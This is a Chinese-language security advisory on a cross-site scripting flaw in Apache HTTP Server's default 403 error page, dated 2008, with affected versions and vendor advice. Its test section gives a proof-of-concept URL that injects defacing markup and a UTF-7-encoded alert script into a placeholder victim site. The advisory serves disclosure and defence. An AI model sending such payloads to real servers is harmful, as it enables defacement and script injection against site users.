阅读全部内容

Apache HTTP服务器403 Error页面跨站脚本漏洞

[字体：大中小]

受影响系统：

Apache Group Apache 2.2.x
Apache Group Apache 1.3.x

描述：

BUGTRAQ  ID: 29112

Apache HTTP Server是一款流行的Web服务器。

如果Apache服务器使用Forbidden 403默认页面的话，则用户在该服务器上请求特制的URL触发403 Error错误后就可能导致在用户浏览器会话中执行跨站脚本。

<*来源：Yaniv Miron

  链接：http://marc.info/?l=bugtraq&m=121034653105913&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--

建议：

厂商补丁：

Apache Group
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.apache.org

日期：2008年05月

【 hits:】【评论】【推荐】【打印】

上一篇：cPanel跨站脚本和跨站请求伪造漏洞
下一篇：Microsoft Jet数据库引擎MDB文件解析远程栈溢出漏洞(ms08-028)